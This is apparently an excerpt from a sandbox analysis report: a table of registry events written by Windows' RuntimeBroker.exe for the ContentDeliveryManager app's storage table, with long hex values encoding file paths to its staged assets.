| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\816de696-adc4-4ded = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6d34842b-5822-44c2 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25277d3b-31b4-4eaa = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001486422405b1da01f06bca2405b1da01f06bca2405b1da013f110a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc588a6d2000343862633762303665613833323263643661663831643661343530386633333733623962386238313362633939386436613232346365616265313363396639610000b20009000400efbebc588a6dbc588a6d2e000000000000000000000000000000000000000000000000000c0d2200340038006200630037006200300036006500610038003300320032006300640036006100660038003100640036006100340035003000380066003300330037003300620039006200380062003800310033006200630039003900380064003600610032003200340063006500610062006500310033006300390066003900610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ef05f8411000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34386263376230366561383332326364366166383164366134353038663333373362396238623831336263393938643661323234636561626531336339663961000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464db248038243f0def11b8c0c2babbd8d0a35efd912f2a58f84f87a07e819e0464db248038243f0def11b8c0c2babbd8d0a3d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9df793d3-2b92-4650 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5845b22a-cd5c-4a60 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000068ad492405b1da0132bbb92405b1da0132bbb92405b1da01da180c000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc588a6d2000646534353931356234616636306137363266306232353931643532393532383765643739383162643237323465343737383034643933373031393131623039610000b20009000400efbebc588a6dbc588a6d2e00000000000000000000000000000000000000000000000000c65c1100640065003400350039003100350062003400610066003600300061003700360032006600300062003200350039003100640035003200390035003200380037006500640037003900380031006200640032003700320034006500340037003700380030003400640039003300370030003100390031003100620030003900610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ef05f8411000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64653435393135623461663630613736326630623235393164353239353238376564373938316264323732346534373738303464393337303139313162303961000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464db238038243f0def11b8c0c2babbd8d0a35efd912f2a58f84f87a07e819e0464db238038243f0def11b8c0c2babbd8d0a3d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25277d3b-31b4-4eaa = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9df793d3-2b92-4650 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001224402405b1da01f06e8c2405b1da01f06e8c2405b1da01ed9209000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc588a6d2000333363396564306239613731316532633437666630303031613438653531393130663063316430363730366534346365663861306631383439323332373530610000b20009000400efbebc588a6dbc588a6d2e0000000000000000000000000000000000000000000000000097e61a00330033006300390065006400300062003900610037003100310065003200630034003700660066003000300030003100610034003800650035003100390031003000660030006300310064003000360037003000360065003400340063006500660038006100300066003100380034003900320033003200370035003000610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ef05f8411000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33336339656430623961373131653263343766663030303161343865353139313066306331643036373036653434636566386130663138343932333237353061000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464db218038243f0def11b8c0c2babbd8d0a35efd912f2a58f84f87a07e819e0464db218038243f0def11b8c0c2babbd8d0a3d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6d34842b-5822-44c2 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5e8ec213-3ffa-4d79 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\86d0a152-43d0-4144 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6d34842b-5822-44c2 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000003b5f3b2405b1da01efbc9a2405b1da01efbc9a2405b1da01e27c09000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc588a6d2000373939386434623438653766636533376565333664363862663062346438646631363831643562616361393530633662663138313865633633393037646463360000b20009000400efbebc588a6dbc588a6d2e00000000000000000000000000000000000000000000000000e7f82d00370039003900380064003400620034003800650037006600630065003300370065006500330036006400360038006200660030006200340064003800640066003100360038003100640035006200610063006100390035003000630036006200660031003800310038006500630036003300390030003700640064006300360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ef05f8411000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37393938643462343865376663653337656533366436386266306234643864663136383164356261636139353063366266313831386563363339303764646336000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464db228038243f0def11b8c0c2babbd8d0a35efd912f2a58f84f87a07e819e0464db228038243f0def11b8c0c2babbd8d0a3d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5845b22a-cd5c-4a60 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\816de696-adc4-4ded = "\\\\?\\Volume{8A2AD7B7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7998d4b48e7fce37ee36d68bf0b4d8df1681d5baca950c6bf1818ec63907ddc6" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6d34842b-5822-44c2 = 7382b72405b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6d34842b-5822-44c2 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5845b22a-cd5c-4a60 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25277d3b-31b4-4eaa | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25277d3b-31b4-4eaa = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15b190d0-8256-458d = "\\\\?\\Volume{8A2AD7B7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\33c9ed0b9a711e2c47ff0001a48e51910f0c1d06706e44cef8a0f1849232750a" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\86d0a152-43d0-4144 = "\\\\?\\Volume{8A2AD7B7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\de45915b4af60a762f0b2591d5295287ed7981bd2724e477804d93701911b09a" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5e8ec213-3ffa-4d79 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15b190d0-8256-458d = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15b190d0-8256-458d = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9df793d3-2b92-4650 = 2d7ca92405b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5845b22a-cd5c-4a60 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5e8ec213-3ffa-4d79 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\816de696-adc4-4ded | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\816de696-adc4-4ded = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25277d3b-31b4-4eaa = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5e8ec213-3ffa-4d79 = 98cf072405b1da01 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15b190d0-8256-458d = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\86d0a152-43d0-4144 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000003a75102405b1da013a75102405b1da013a75102405b1da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc588a6d2000646534353931356234616636306137363266306232353931643532393532383765643739383162643237323465343737383034643933373031393131623039610000b20009000400efbebc588a6dbc588a6d2e00000000000000000000000000000000000000000000000000c65c1100640065003400350039003100350062003400610066003600300061003700360032006600300062003200350039003100640035003200390035003200380037006500640037003900380031006200640032003700320034006500340037003700380030003400640039003300370030003100390031003100620030003900610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ef05f8411000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64653435393135623461663630613736326630623235393164353239353238376564373938316264323732346534373738303464393337303139313162303961000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464db1f8038243f0def11b8c0c2babbd8d0a35efd912f2a58f84f87a07e819e0464db1f8038243f0def11b8c0c2babbd8d0a3d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
